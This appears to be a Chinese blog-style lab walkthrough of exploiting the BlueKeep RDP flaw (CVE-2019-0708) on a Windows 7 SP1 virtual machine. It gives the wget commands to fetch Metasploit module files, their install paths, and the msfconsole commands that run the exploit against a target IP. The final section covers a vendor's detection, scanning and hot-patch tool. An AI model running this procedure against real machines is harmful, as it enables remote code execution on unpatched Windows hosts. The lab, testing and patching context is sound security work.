0X00 靶机
漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,一下就ojbk,你们没有,就下载装吧!
使用VM安装Windows7 SP1模拟受害机
Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
0x01 MSF的折腾
我是**msf5 **
msfconsole...先启动起来吧!
下载exp:
首先,我们需要下载好攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
做如下替换(看你的msf装在哪个目录吧!别瞎换!)
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
msf启动起来了,reload_all
发现那几个exp没进去,需要升级msf
msfupdate
按照提示走一波
apt update
apt install metasploit-framework
最后再去执行reload就ojbk了
realod_all
0x02 漏洞利用
use exploit/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.101
set target 3
exploit
成功利用!
0x03 漏洞检测修复工具&批量快速扫描检测工具&热补丁工具
(来源奇安信公众号)
使用说明
下载页面:
https://www.qianxin.com/other/CVE-2019-0708
使用说明:
1、 下载文件进行解压。
2、 使用win+R快捷键或开始菜单选择“运行”,输入cmd。调起命令行工具。
3、 在命令行工具,执行命令到工具所在文件夹
4、 输入命令对应功能,启用热补丁命令:QKShield.exe /enable ;禁用热补丁命令:QKShield.exe/disable 。
5、 重启系统后,需要重新运行命令行来启用热补丁
实现效果:
在工具支持的系统中启用热补丁后,用漏洞扫描工具扫描结果为没有漏洞。漏洞扫描工具下载地址:https://www.qianxin.com/other/CVE-2019-0708
支持系统:
Windows XP for 32-bit Systems Service Pack 3
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2003 for 32-bit Systems Service Pack 2
Windows Server 2003 R2 for 32-bit Systems Service Pack2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack2
Windows Server 2008 for x64-based Systems Service Pack2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1 (Server Core installation)
暂不支持的系统:
Windows Server 2003 for x64-based Systems Service Pack2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 R2 for Itanium-Based SystemsService Pack 1
- 参考链接
http://www.nmd5.com/?p=409
https://www.qianxin.com/other/CVE-2019-0708